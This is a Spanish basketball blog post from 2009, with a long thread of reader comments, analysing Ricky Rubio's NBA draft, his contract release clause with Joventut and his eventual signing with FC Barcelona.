El caso Ricky Rubio

02 de September de 2009 por Queco

Ahora que por fin se ha acabado llega el momento de comentar todo lo sucedido en torno a Ricky Rubio este verano, desde su declaración como “elegible” en el draft, hasta su fichaje por el Regal Barcelona por una cifra récord, pasando por la demanda que interpuso a su club, su negativa a irse a Minnesotta o al Real Madrid y el hecho de no querer hacer workouts para determinados equipos de la NBA.

Pero vayamos por partes y empecemos por el principio, más o menos: El 21 de abril Ricky se declara elegible para el draft, aún con la posibilidad de retirarse hasta diez días antes de su celebración. Su cláusula de rescisión de contrato ascendía en ese momento a 4’7 millones de euros, de los cuales el equipo NBA que se hiciera con sus derechos sólo podría pagar 500.000 dólares, unos 350.000 euros al cambio actual. El resto, habría de afrontarlo el propio Ricky con su propio salario. Lo peor del asunto es que la cláusula aumentaría al terminar el mes de junio, pasando a ser de 6 millones de euros.

Llegados a este punto voy a explicar un poco como funciona el tema salarial para los rookies en la NBA. Los contratos para los rookies están estipulados por convenio y van decreciendo conforme a la elección. Así, el número uno del draft cobra el primer año 4’15 millones de dólares, la segunda elección baja a 3’71M, la 3ª a 3’33M, la 4ª a 3M y la 5ª, que fue el puesto de Ricky, cobra 2’72M de dólares en su primer año. Recordad que además los rookies sólo tienen asegurados dos años de contrato y que aunque en el segundo se cobra más que en el primero, la diferencia es mínima. El tercer y cuarto año son opcionales ya que son los equipos los que deciden si quieren seguir contando con el jugador, y es en el cuarto cuando se produce una gran subida salarial, del orden de un 26% respecto a lo que se cobró el tercer año.

Con el tema del cambio euro-dólar junto con el hecho de tener sólo dos años de contrato asegurados, bajar del número 3 complicaba, como podía ver todo el mundo, el pago de la cláusula (la de 4’7M de euros, no digamos ya la de 6M). Era un problema que todos teníamos en cuenta antes incluso de que Ricky decidiera presentarse. Todos menos, por lo visto a posteriori, el propio entorno del jugador. Lo cierto es que tampoco parecía un problema grave, ya que llevaba dos años instalado cómodamente como número 1 ó 2 del draft en casi todos los mocks. Según se iba acercando el momento el número uno se hacía más inaccesible, pero el 2 parecía suyo.

Pero resultó que el número dos fue a parar a Memphis, y el señorito Ricky no quiso saber nada de ellos. El 3 fue para Oklahoma,que tenía otras cosas en mente, pero si venía Ricky… y el cuatro se lo llevó Sacramento, que también estaba muy interesado en el jugador español. Mientras, Minnesotta se hizo con el 5 vía trade. Todos estaban interesados, pero todos tenían en mente la dichosa cláusula.

Así que se intentó negociar con la Penya una rebaja de dicha cláusula, algo a lo que Jordi Villacampa, presidente del club, se negó desde el primer momento. Claro que antes había sido el propio Ricky quien se había negado a renovar a principios de año, aumentando su cláusula para Europa, pero reduciéndola para la NBA a “sólo” 3 millones. Y como el DKV no daba su brazo a torcer Ricky acabó denunciando la cláusula ante la justicia ordinaria para que se la rebajaran. Que no digo yo que no lo hubiera conseguido, pero tampoco digo que no la hubiera firmado libremente. No sé si me seguís…

En esto llegó el draft, con Ricky sin hacer workouts vete a saber exactamente porqué y con el tema de la cláusula sin resolver ni con pinta de resolverse pronto. Y el base del Masnou cayó al número 5, a Minnesotta Timberwolves que estaban contentísimos. Menos contento estaba Ricky que sin razón aparente tampoco quiso saber nada de los Wolves. Y ya desde ese día se empezó a especular con que o lo traspasaban o se quedaba en Europa.

Minnesotta no quería traspasarle así que iba a tener que quedarse en Europa. El caso era ¿dónde? En la Penya estaba claro que no. Claro para todos, excepto, de nuevo, para el propio Ricky que no veía nada raro en quedarse en el equipo al que había denunciado unos meses antes. Habría que esperar a que algún equipo, de los grandes, grandes, se interesase por él. Tampoco era díficil y los griegos aparecieron rápidamente, casi a la misma velocidad a la que Ricky dijo que ni hablar de ir a Grecia. Apareció también el Madrid, que llegó a un acuerdo con la Penya, pero no con Ricky que ya había declarado que no quería moverse de Catalunya. Blanco y en botella: quería al Barça que ofrecía al principio mucho pero mucho menos que el equipo madrileño. Después de arduas negociaciones, Villacampa llegó a un acuerdo con ¡¡Minnesotta!! para rebajar el precio de salida a lo mismo que pagaba el Real Madrid. Eso sí, como explicábamos al principio tenía que ser el propio Ricky el que se hiciera cargo. Pero nanay, Ricky quería el Barcelona que finalmente llegó a lo que el Joventut pedía.

Llegamos al final, con Ricky en Barcelona, al menos dos años, y diciendo que no había ido a Minnesotta porque para pagar la cláusula tendría que meterse en líos de avales y créditos, toda una novedad a 1 de septiembre, sobretodo sabiendo todo lo que os he contado. Y ahora veremos porque dentro de dos años toca renegociar el convenio colectivo de la NBA y eso siempre trae problemas, pólemicas y hasta cierres temporales…

En fin, Ricky no ha salido más arriba en el draft porque no ha querido, no se ha ido a la NBA porque no ha querido, y viendo como ha ido todo, no se sabe muy bien porqué quiso presentarse al draft. Quizá porque tiene 18 años y no sabía dónde se metía, quizá porque ha estado mal aconsejado (¿Fegan de agente? Venga ya…), quizá porque ser jugador de baloncesto, y de los muy buenos, desde los 12 años, no haga más que añadir un sufijo despectivo a lo que Ricky es todavía, un niño.

Comenta

27 comentarios a esta entrada

  1. Txusma dice:
    #1

    Vaya por delante que para mi Ricky es un autentico crack y que ningun tipo de juicio sobre su actuacion en este embrollo me hara dudar de su calidad como jugador.
    A partir de aquí hay muchas cosas que no se entienden. La primera y principal es pq Ricky (y supongo q principalmente sus padres) firman el contrato tan draconiano que firman con la Penya? Estoy seguro de que muchisimos clubs habrian mejorado sustancialmente los acuerdos que cerraron con el Joventut. Puede ser que la Penya (club emblema de la cantera) se aproveche en ocasiones de sus retoños firmandoles clausulas altisimas para el sueldo que paga? Si es una practica habitual pq los jugadores se quedan en el club? Pq Ricky y sus padres no dijeron “perdona, pero esa clausula es totalmente desproporcionada y si no la bajas, cojo y me llevo al niño a otro sitio”? También es posible q en aquella epoca la NBA quedara un tanto lejos y echando cuentas en el 2011 seria todavia un buen año para presentarse, ya libre de cualquier traba.
    Esto nos lleva al segundo gran interrogante: Para que te presentas al draft este año si luego todo van a ser pegas? Ricky ya sabia que la clausula iba a ser un problema de los gordos y de hecho en diciembre de 2008 su idea era la de no presentarse. Q le hace cambiar de opinion? Puede ser q fuera que todo el mundo decia q la calidad del draft del 2009 era muy baja? Los cantos de sirena se vuelven demasiado insistentes?
    Una vez decide presentarse, salta el tercer interrogante: Pq todos tus movimientos parecen ir encaminados a evitar salir elegido en segunda posicion? Negativas para ir a hacer workouts, declaraciones de preferencias de equipos imposibles (NY), denuncia al Joventut complicando aún más el tema de la cláusula… Parece como si Ricky se estuviera arrepintiendo de lo del draft y buscara una excusa para no tener que irse. Es que creo que ningún movimiento fue dado en la dirección correcta.
    Y llegamos a los últimos interrogantes: Lo puedo llegar a entender pero… como dices q te quieres quedar en Cataluña si hace dos meses te ibas a ir a la NBA? Como puede ser que finalmente, la Penya llegue a un acuerdo con los Wolves y tu sigas prefiriendo el Barça? Que esta pasando?
    Creo que despues de todos estos meses la imagen de Ricky ha quedado un tanto dañada aquí y en la NBA. Posiblemente en 4 meses se nos haya olvidado pero de momento la sensacion que me queda es más bien mala. Por otro lado, manda narices la norma de la NBA que dice que no los equipos no pueden pagar más de 500.000$…

      Citar

  2. Dantley2 dice:
    #2

    Gran explicación, Queco. La verdad es que muy mal llevado de principio a fin. Con lo políticamente correctos que son en la NBA dicen que respetan la decisión y tal y tal, pero es como para no querer verlo en años. La decisión de contratar a Fegan es la que se dice del aeropuerto de los Rodeos en Tenerife, que un ingeniero señaló una cruz en el mapa y creyeron que era su elección, cuando en realidad era la elección que había descartado por absurda. Pues con Fegan igual, después del lío que formó con Yi Jianlian era el único agente al que no debían haber contratado.

    A ver si no le afecta a su juego. Pero vamos, que el Barça ya sabe que cuando le plazca, la volverá a formar (por ejemplo, que los Knicks se hagan con sus derechos y al señorito le apetezca jugar con los Knicks en el 2010) pidiendo que se baje la cláusula o vete tú a saber qué.

      Citar

  3. Kantonyo dice:
    #3

    Yo creo que si la intención primera de Ricky era dar un salto a un grande de Europa, le ha salido redonda, ya que ni en sueños el Juventut le hubiera dejado salir por la cantidad q ha pagado el Barca.

    Pero si su intención era llegar a la NBA, ha tenido la peor publicidad posible, sobre todo teniendo en cuenta el sentimiento de orgullo del ciudadano americano.

    Incluso como españoles nos cuesta entender a Ricky, pues imaginaros alli…

      Citar

  4. Queco dice:
    #4

    Kantonyo, has dado para mí la única explicación razonable a todo el comportamiento que ha tenido Ricky, y es que en ningún momento haya tenido intención real de ir a la NBA, sino que su idea era irse del Joventut a donde le pagaran más, durante, al menos, un par de años. Eso sí, que sea una explicación razonable no quita que sea una maniobra un tanto rastrera y rebuscada, pero bueno…

      Citar

  5. TheDeerHunter dice:
    #5

    Excelente artículo, Queco…
    Yo estoy en la línea de lo último que habéis insinuado.
    Desde prácticamente todo el proceso ha habido un run-run de “lo mal que está haciendo las cosas Ricky” para mí asombrosamente popular.
    En este punto nos encontramos en que el chaval, con la edad que tiene, es fichado por un pastizal histórico por ahora mismo uno (si no el que más) de los proyectos más atractivos del panorama baloncestístico europeo (y en cierto modo mundial… porque me dirás lo que mola jugar en los wolfis ahora mismo) y de golpe su cuenta corriente crece de manera multi-exponencial… y en lo de la NBA todavía no se ha dicho la última palabra, que no nos extrañe nada que le salga todavía mejor la jugada y que el amigo Kahn mal-tradee sus derechos en un mal entendido “orgullo americano” como decía Kantonyo.
    Al final se queda dos años asentando su juego en España, como muchos le pedían, y ¿porqué no? creandose un mejor nombre del que en teoría hubiera podido hacerse en el joventut (ojo, que sólo lo digo por tema títulos, porque a mí es uno de los clubs europeos que más simpatías me genera), creando un cierto halo de “lo queríamos tener aquí en la NBA y no lo tenemos” y de paso cobrando muchísmo más.

    Qué mal ha hecho las cosas Ricky… y que mal aconsejado a estado. Vaya.

    PD: Lo del lockout del 2011 me parece un poco parida. Ricky tendrá ¿20 años? en ese momento.

      Citar

  6. couxe dice:
    #6

    A mí lo que me hace mucha gracia en este caso es lo de que el señor Villacampa se sienta maltratado por Ricky…

    – Firmar a un chaval de 16 años por 5 temporadas y con una de las mayores cláusulas de la historia del baloncesto, obviamente inafrontable para el jugador… Unos pocos miles de euros…
    – Disfrutar del probablemente mejor base de la acb las últimas dos temporadas…. Sobre cien mil euros…

    – Venderlo por varios millones, casi la mitad del presupuesto de tu club, y poner cara de indignado y maltratado cuando has pegado el braguetazo del siglo… No tiene precio…

    En cuanto a Ricky, pues el tiempo dirá si se ha equivocado o no, para mí ha acertado de lleno con su última decisión (que no con los vaivenes previos)…
    Pero el que se le esté dando tanta caña a un chaval de sólo 18 años, con un entorno que le habrá mareado hasta la saciedad… con un abusivo contrato en vigor que él no había firmado… con un agente que muy probablemente sólo busca sacar la mayor tajada posible… y con un presidente cuyo interés por el bienestar del jugador se resumió en “… te irás con quien más me pague, y si me paga lo suficiente…”, pues me parece mucho cargar las tintas contra él…

    Recordemos lo siguiente…
    – Ricky ahora mismo no es ningún millonario, de hecho, todo lo que hasta ahora ha ganado en el Dkv probablemente no le alcance ni para comprarse un apartamento de 30m² en Madrid centro…
    – Marcharse a la Nba ya mismo le suponía prácticamente no ver ni un solo euro en los próximos 3 años…
    – Quedarse en el Barça le supone, al margen de jugar más minutos y estar en casa, ganar 1,4 millones en dos años, y una salida a la Nba infinitamente más beneficiosa que la actual después de ese tiempo…
    Vamos, que vistas las opciones, ni punto de comparación…

      Citar

  7. Txusma dice:
    #7

    Estoy de acuerdo contigo en que tampoco la Penya es aquí la gran victima de esta historia. Como dices, seguro que estan la mar de contentos con los casi 4 millones de euros que han ingresado gracias al affer Ricky y ademas se lo han montado muy bien para parecer realmente dolidos y ultrajados.
    Lo q no acierto a comprender es pq los padres de Ricky firmaron aquel contrato en el 2006, contrato abusivo en la relacion entre la clausula de rescision y el salario a percibir por el jugador. Creo que por aqui debe haber algo q no sabemos pq estoy seguro q si los padres de Ricky se hubieran movido un poco habrian encontrado mas de un equipo y mas de dos que hubieran mejorado la oferta y así podrian haber presionado algo más al Joventut.

      Citar

  8. Jabho dice:
    #8

    Puede que al final tanto él como el Juventud hayan conseguido más o menos lo que querían, aunque la imagen de ambos (y especialmente la de Ricky) han quedado tocadas….

    Yo de todo lo que no entiendo ni de lejos es porqué se presentó al draft. Es que ni de lejos llego a entenderlo… Creo que buscaba un trade de que le dejará en NY y a partir de ahí la cosa ha ido dando tumbos en intenciones y declaraciones… Contentos tienen que estar los Wolves que le eligieron con un pick que les salió caro, que han hecho verdaderos esfuerzos por llevarlo allí y de momento nones… y ya veremos.

    No me gusta nada como se ha llevado el tema. Creo que podría haber llegado a lo mismo (firmar por el Barça) por un camino completamente distinto.

      Citar

  9. TheDeerHunter dice:
    #9

    La razón en teória es bastante lógica… un pick nº 2 a priori garantizado y con él un impulso bestial de su carrera en la liga.
    Lo que yo sí que no entiendo es que cómo pensaba ser pick 2 y encima en un equipo con solecito, mercado bestial (sí, los primeros puestos en el draft habitualmente los pillan las mejores franquicias) y también los minutos que le diera la gana a él.

    De todas formas yo sí que no creo que lo del Barça fuera un plan preconcevido. Soy así de inocente yo.

      Citar

  10. Queco dice:
    #10

    TheDeerHunter, yo tampoco creo que lo del Barça fuera un plan preconcebido. Sólo lo veo como la única explicación lógica al comportamiento de Ricky, que en mi opinión, no se excusa ni en que tenga 18 años, ni en que sus padres no se qué, o en que su agente no se cuánto. Ha ido de estrella del rockandroll, y estrella veleta, además.

    Y el hecho de que el asunto haya terminado con una buena solución, no me dice nada, porque igual que ha acabado así, ha podido acabar dos años en el banquillo del Joventut, agitando toallas.

      Citar

  11. Charlyjauskas dice:
    #11

    Queko, queko, queko…Que voy hacer contigo???jejejeje.Buen escrito aunque se te ha olvidado contar la parte mala del DKV.;)

    Bastante de acuerdo con lo escrito con Couxe…
    Para mí Villacampa no se queda muy lejos del Base de El Masnou…Eso de darle clases de comportarse cuando él cada verano venía con el precontrato firmado con el Barça para subírselo en el DKV…
    El atacar a Ricky con comunicado del otro día diciendo que su prioridad como presidente era “que el jugador cumpla su sueño”, pero como se puede tener tanta cara Señor VillaCampa???Desde Abril diciéndole que no le bajaban ni un mísero €.Sólo se ha dignado a negociar con los Wolves porque el Barça es al único destino europeo que quería ir Ricky por cercanía(cosa bastante normal diría yo o por lo menspo entendible), seguro que si el Madrid hace la oferta del Barça y acepta el Barça por el tema económico, Ricky pasaría a ser El Pesetero.La verdad que Ricky no habrá quedado en buen lugar pero el DKV tampoco.
    Lo del comunicado es una falta de clase y querer enmierdar todo flipante…Que cara tiene, anda que comentó que la oferta NBA el 85% se lo tenía que cobrar él…

    También me gustaría decir que los de la NBA son unos listos cómo bien ha mencionado Txus.Se aprovechan de Europa cosa mala y es lo que está creando tantos problemas de salidas pero mientras no nos plantemos seguirán provocando éstos cismas por Europa, bueno más bien en España.
    Si estuviera legislado con justicia en la NBA no se darían tantos problemas, aunque también es verdad que el tema cláusulas sólo existe en España y és dónde se crean más éstos problemas, ciertamente habría que ponerse en serio a arreglarlo de alguna manera porque seguramente vaya a peor.

    Pero bueno, es lo que hay.

    Respecto al tema, que me voy por la tangente, Queko, ni Ricky es el Diablo ni el espítitu santo, ha hecho varias cosas mal de las que has comentado. Contratar a Fegan y demás pues es cierto que creo que se equivocó totalmente. Mala estrategia esa de ir eligiendo franquicia, porque en EEUU con esas cosas son muy suyos…Aunque también creo que tantas vueltas en la decisión han tenido que ver con que Jordi no íba a dar su brazo a torcer con la NBA(a pesar de que ahora se ha tirado una semana pensado como mandarle para allá y no enviarle al Palau). ….Y entonces es cuando pide ayuda a la Penya, equipo por el que había estado cobrando como el 10º jugador siendo casi el mejor durante un par de temporadas y éstos se niegan a negociar, que no vengan ahora con historias porque desde un principio se negaron a cualquier rebaja. Diréis que lo firmó y tal pues sí, pero lo que no puedes hacer es luego ir a llamar a los equipos europeos para que se lo lleven por menos de la cláusula.
    Y Txus pregunta que porque no se movieron?Pues porque el chico es del DKV, y esperaba que llegado el momento(ingenuo de él) sentir el DKV sirviera de algo pero está visto que no. Pero después de éstos contratods draconianos los próximos Ricky’s del DKV ya se mirarán mejor los contratos y posiblemente no les lleguen tantos jugadores…Sólo tenéis que ver lo que ha pasado con el amic Pau Ribas…

    Luego también cachondo que diga que Ricky no se moverá de su casa y por detrás ofreciéndoselo a Flo…

    La imagen de Ricky dudo que haya quedado mal…En Minnesota, of course y en Joventut pues supongo que también por el tema de que va al Barça. Por lo demás creo que mantendrá su imagen porque se le ve un buen chico pero creo que ha sido mal aconsejado.

    Me está quedando un megatocho y encima super malorganizado.xDDD

    Resumiendo que el DKV ha hecho lo que tenía que hacer, exactamente IGUAL que Ricky. Si se hubieran puesto de acuerdo seguramente hubieran salido ganando todavía más pero una vez se enquistó todo la cosa era difícil de arreglar.Creo que amabas entidades han salido ganando junto al Barça, que por una vez y después de los 3 varapalos de Marc,Ersan y David por fín hemos vencido a la NBA, aunque sea por casualidad geográfica.xDDDD

    Asique a disfrutar de la conesxión Ricky-NBArro!!!!

      Citar

  12. Charlyjauskas dice:
    #12

    Si hombre Queko y yendo a llevar las botellitas a los chavales de la cantera…
    Vamos, deja VillaCampa a Ricky 2 años en el banquillo y aparte de ser un presidente sin cabeza alguna por el dinero que hubiera perdido, encima le hace casi un favor a Ricky…

      Citar

  13. portu dice:
    #13

    Couxe lo ha explicado muy bien, la diferencia económica de ir al Barça o ir a los Wolves es absolutamente demencial. Navarro ya pudo permitirse una aventura americana perdiendo dinero, pero después de bastantes años de contratos buenos en Europa, pero es q Ricky no estaba en esa situación… y lo de Villacampa es un abuso, me ha parecido una postura intolerante e incluso arriesgada, Ricky podría haberse enrocado, no querer irse a ningún lado y salir gratis en 2 años… obviamente sin jugar, pero seguro q en tema de tribunales hubiese acabado teniendo razón.

    Ya metidos en este asunto, a mi me despierta serias dudas el verdadero potencial de Ricky. No dudo de q puede ser un jugador de nivel de titular en la NBA, pero tb creo q lo pudo ser Navarro y lo podrían ser otros q no han tenido la oportunidad pq allí no les dieron confianza. Ricky destaca sobretodo por su inusual madurez, eso le hace estar a años luz de su generación pero llegará un momento en q eso no tendrá mayor progresión, no habrá diferencias ostensibles con otros bases de 25 o 26 años; en cuanto a su capacidad defensiva, pues es brutal su manera de robar balones, pero ojo, q cuando un base ataca la canasta Ricky sufre muchísimo, su virtud no es tanto el desplazamiento lateral como la eficacia de sus brazos largos y su intuición para robar, pero ante un 80% de bases chupones como hay en la NBA su defensa será criticada; su físico es bueno, pero no está al nivel de Llull, ni Calderón, ni Sada ni otros bases de semejante estatura, le falta potencia, velocidad y salto, además no parece q haya mejorado demasiado en estos 2 años, tb será un tema q le restará en la NBA, sobretodo pq apenas tendrá confianza para entrar a canasta; en visión de juego es bueno, sobretodo en transiciones rápidas, si su entrenador comparte esa filosofía podemos estar ante un nuevo Kidd, pero tb tiene gran visión de juego Sergio Rodríguez y todos sabemos como le ha ido hasta ahora; y finalmente el tiro, quizás menos preocupante de lo q parecía pq aquí sí se nota una mejoría progresiva, nunca será un tirador excelso pero es un jugador de buenas rachas.
    Globalmente creo q su fama puede hacer q se le abran las puertas de una titularidad q tíos como Calderón se han currado ha saco, y siendo titular sí puede destacar, igual q destacarían si fueran titulares en la NBA Llull, Sergio Rodríguez, Navarro o algunos otros, pero quien espere una superestrella creo q anda equivocado. Su gran virtud no creo q sea tanto su potencial como lo es su precocidad, donde sí q es un auténtico nº 1.

      Citar

  14. Queco dice:
    #14

    A ver Carlos, ¿en que momento he juzgado yo al DKV, ni a Villacampa? Yo he hablado de Ricky, de lo que él ha hecho, o dejado de hacer.

    A partir de ahí, si quereis luego hago otro artículo hablando de lo que ha hecho Villacampa. Eso sí, yo no soy Trecet, no me chupo el dedo, ni hago que me lo chupo. Ricky firmó un contrato, dijo que se iba sin saber si podía, luego no le gustó adonde iba o lo que sea, luego sí, al final no, y por último pone excusas baratas.

    Villacampa sería un mal presidente si dejase a Ricky dos años en el banquillo, porque su club no tiene dinero, o tiene poco. Si fuese un club rico, habría que verlo. Y que le haría un favor al chaval dejandole dos años sin jugar, habría que verlo también.

      Citar

  15. portu dice:
    #15

    Queco, según lo último q comentas parece q en la vida no se pueda cambiar de opinión… y qué narices va a saber de la vida un chaval de 16 años de todo lo q se le viene encima… pues firma algo q cree correcto a los 16 años para seguir con su precoz carrera y ya irán viniendo las cosas futuras, no? luego hay variables q él no controla q le han marcado nuevas pautas y dudas en sus decisiones, tan ilógico ves q cambie de opinión?

      Citar

  16. Txusma dice:
    #16

    Yo personalizo en la figura de Ricky a todo su entorno. Cuando digo “Ricky se equivoco al firmar ese contrato” me refiero a q sus padres se equivocaron al firmar ese contrato pq, como dice Portu, q va a saber un chaval de 16 años. Les ponen 70.000€ euros delante y les da igual la clausula y cualquier otra cosa.
    Cada vez q lo pienso mas creo q a principios d este año RIcky (recuerdo: estoy personalizando al entorno) se dio cuenta de q estaba haciendo el canelo y q estaba ganando una misera comparado con la mayoria de sus compañeros. El contrato era hasta el 2011 asi q iba todavia ser “estafado” un par de año más. Y aqui fue cuando hubo el cambio de opinion (recordemos q en diciembre no se iba a presentar al draft) y decidio declararse elegible. Pq? Pq en realidad solo habia 2 opciones posibles:

    – Todo iba bien, el DKV le rebajaba la clausula y Ricky jugaba en la NBA, ganando mas o menos el mismo sueldo q en el DKV pero con una proyeccion bestial lo q podria generarle muchos ingresos en 2-3 años.

    – O todo iba “mal”: el DKV no le rebajaba un centimo y el y su agente provocaban q la situacion se volviera insostenible por un lado denunciando al club y por el otro intentando rebajar su stock en el draft para caer algunas posiciones y hacer aun mas dificil su salida a la NBA. De esta manera la unica salida al entuerto tendria q ser la que ha sido: que se fuera a un club grande de Europa donde cobrara lo que realmente se merece hasta el año 2011 o 2012, q creo es cuando, dsd el principio, Ricky ha querido ir a la NBA.

    El tiro le ha acabado saliendo bastante bien pq ha podido elegir club y creo q si en 3 años el jugador no va a la NBA al cuarto puede negociar su sueldo (tendria q acabar de confirmar esto). El precio? una imagen algo empeorada, sobretodo en USA.

    Teoria conspiratoria?

      Citar

  17. Txusma dice:
    #17

    Y sobre el tema de los contratos del Joventut. Cuidadin q le puede afectar y mucho. Seguramente muchos padres se miraran los contratos con lupa y ya nadie se dejara llevar por los sentimientos. Esto es un negocio, amigos!

      Citar

  18. Queco dice:
    #18

    Portu, como dice Txus, en “Ricky” va su entorno incluido. Y sí, veo ilógico cambiar de opinión así, de esa manera.¿Que pasa, que cuando dio la rueda de prensa anunciando su marcha lo hizo al tuntún? ¿Que no sabía en lo que se metía? ¿Que no pensó cuando firmó este contrato en irse a la NBA, aun a pesar de saber que ya hacía años que lo seguían?

    Lo siento, será que a mi me han enseñado desde pequeñito que hay que tener mucho cuidado con lo que se firma, que va a misa, y a ser consecuente con lo que haga y diga. Porque una cosa es cambiar de opinión (se pudo haber retirado del draft hasta diez días antes eh), y otra ahora voy, ahora no, ahora voy pero al equipo que yo diga, ahora denuncio la cláusula, ahora quito la denuncia….

    Y una cosa que se me olvidó antes, aunque ya digo en el artículo, respecto a eso de que Villacampa no dice que en el acuerdo al que llega con los Wolves Ricky ha de hacerse cargo de gran parte de la cláusula ¿de eso se enteró ahora?

      Citar

  19. couxe dice:
    #19

    Queco, solamente una puntualización respecto a lo último que comentas…
    Hasta el mismísimo momento en que un club Nba y el Dkv no llegasen a un acuerdo, Ricky no sabía cuanto dinero realmente debería aportar de su bolsillo. Sabía seguro que iba a ser bastante, pero no exactamente cuanto y ese es un factor determinante a la hora de decidir, vamos, creo yo…
    Justo en el momento en el que ese acuerdo se produce, es decir, lunes noche, a Ricky le llaman y le dicen:
    “Hemos llegado a un acuerdo por 3,7 millones de €, por lo que si te quieres venir con nosotros deberás aportar de tu bolsillo sobre 3,15 millones…”
    Llegados a ese punto, me imagino que se planteó lo siguiente:
    “Tengo garantizados sólo 2 años de contrato a razón de 2,72 millones de $, es decir, 5.44M $… traducido a euros son sobre 3,9 millones de euros… Tengo que pagar 3,15 más los intereses más la comisión del representante, con lo que es muy posible que los dos primeros años incluso me cuesten dinero… Joder… Hasta ahora no he ganado una mierda, si me voy me paso otros dos años sin ganar nada, y como me rompa durante ese tiempo, poco menos que se me jodió la vida… A la mierda la Nba, me quedo en casita con papa y mama, y además ganando un pastizal…”

    Yo creo que llegados a ese punto se puede perfectamente cambiar de opinión, es más, marcharse a la Nba en esas condiciones me parecería un enorme riesgo, amén de una gran estupidez visto lo que tenía en Barcelona…

      Citar

  20. Txusma dice:
    #20

    Couxe, todo eso que comentas ya lo sabía Ricky el día que decidió presentarse al draft. Sabía que tendría que pagar bastante dinero de su bolsillo, más todavía si no era el número 1 o el número 2 del draft. Si sabía todo eso (como lo sabíamos todos) cómo se explican los movimientos que realizaron él y su agente y que finalmente provocaron su caída al número 5?

      Citar

  21. portu dice:
    #21

    Entiendo lo q comentais acerca del entorno de Ricky a la hora de firmar cu 1er contrato senior con el DKV, pero sean sus padres los q firmen o sea él mismo yo sigo viendo difícil tener en cuenta todas las variantes posibles, incluyendo NBA como pick alto, a la tempranísima edad de 16 años, creo q a todos les venía grande el tema y dudo q valoraran esa cláusula como algo q realmente hubiese q pagar en algún momento.

    El tema económico q se ha comentado al final… de los 3 y pico q debería pagar Ricky imagino q habría dinero aportado desde áreas próximas a la franquicia de Minesota (empresas, particulares o lo q sea) q supongo q tb habrían ayudado y por otra parte tb habría q tener en cuenta los contratos publicitarios de Ricky, q le aportarían probablemente más pasta q los contratos con Minesota. Dicho esto, la posibilidad de una lesión y las diferencias económicas creo q producen la decisión final. La falta de decisión de Ricky en estos meses se ha basado en lo q ha tenido en cada momento, a cada paso q se quedaba la situación cambiaba y creo q Ricky ha intentado adpatrse a ello como habríamos hecho cualquiera de nosotros.

      Citar

  22. portu dice:
    #22

    En cuanto a su “caída” al pick 5… cabe la posibilidad púramente baloncestística de q su puesto en este draft sea más o menos ese? el 1 estaba claro, el 2 tenía q ser un posible jugador de impacto, quizás asumiendo riesgos y aquí en mi opinión estarían igualados Ricky y Thabeet, pero para el 3 parece claro q los Thunder necesitaban más a Harden q a cualquier otro, siendo evidentemente un buen jugador, y Sacramento pues tb se llevan lo q parece un muy buen jugador. Otra promesa con más potencial q algunos q le precedieron creo q es Jennings y acabó cayendo aún más q Ricky sin tener problemas de cláusulas ni su agente criticando destinos NBA.

      Citar

  23. TheDeerHunter dice:
    #23

    Bueno, entiendo perfectamente que Ricky podría esperar un trato similar que les han dado a otros. Alguna facilidad a cambio de asegurarse una opción a su vuelta… además si hubiera llegado a ser nº 2 sí podría haberla asumido con cierta seguridad.
    No habéis dicho nada del tema del contrato de Ricky y hacienda.

    Los contratos deberían estar para firmarse, sí. Pero son los mismos clubs los que promueven que no se haga cuando es a ellos a quienes le interesa (Véase el caso de Angulo del Valencia C.F por poner un ejemplo de rabiosa actualidad… o en los mismos fichajes de jugadores de otros clubes) Ricky desde luego no es el primer jugador que pone en jaque a un club… y su caso posiblemente haya sido el más sangrante y abusivo de todos los que hemos visto. Ha cobrado una puta mierda del Joventut y ahora ellos se llevan el pastizal padre.
    El final en cualquier caso es feliz para todos. Lo único que salen perdiendo es en términos de imagen… pero es algo que pronto se olvida.

    En cuanto a la caída hasta el nº 5 ya al principio del draft parecía claro que Memphis iba a por Thabeet, así que no creo que hubieran influído nada esos movimientos a los que te refieres. Una vez el 2 ya no estaba a tiro pelillos al río… a seguir con la segunda opción que ya comentabas antes e intentar romper la baraja por el mejor sitio posible para ellos. En realidad lo que ahora les interesa es que los Wolves se cabreen todavía más, así que en cierto modo es lógico todo lo que están haciendo (aunque elegante lo que se dice elegante no demasiado)
    Eso sí… en términos extrictamente deportivos hubiera jurado que los Wolves eran un sitio cojonudo para que Ricky aterrizara este año en la NBA. Dudo mucho que encuentre otra situación mejor en esos términos en el futuro.

      Citar

  24. Óscar dice:
    #24

    Yo también creo que la de los Wolves era una gran opción para Ricky como trampolín en la NBA, pero que se quede en Europa otros dos años le va a venir bien para consagrarse definitivamente, aún tiene mucho margen de mejora, sobre todo en el físico o el tiro de 3, que le iba a quedar un poco grande a día de hoy.
    Con 20/21 años estará de sobra preparado para ser ya importante en la NBA. Cada vez que le veo jugar me sorprende más. Sobre todo en la intuición defensiva y la capacidad de anticipación no he visto un jugador igual.

      Citar

  25. Dantley2 dice:
    #25

    Por cierto, ya tienen sustituto de Ricky (o no) los Wolves. Sessions ha firmado la offer sheet, 16 millones / 4 años con la última player option. Uno que ya se asegura no pasar hambre en un par de generaciones.

    Ahora los Bucks tienen 7 días para igualar o dejarlo ir. El problema en Milwaukee es que están rozando el impuesto de lujo, así que esos 4 kilos anuales, en realidad se le van a más de 6.

      Citar

  26. Txusma dice:
    #26

    Los Bucks no igualaran, por eso draftearon a Jennings

      Citar

  27. Óscar dice:
    #27

    Ya dije en otro post que quien fiche a Ramon Sessions o David Lee acertarán. Con los salarios que se estilan, me parece merecido. Fue uno de los jugadores que más sorprendieron y progresaron el año pasado (al menos para mí), un auténtico hallazgo y muy joven y completo. Si lo consigue MIN, vaya parejita de bases van a tener con él y Jonny Flynn… pero sin Ricky.

      Citar

Deja un comentario

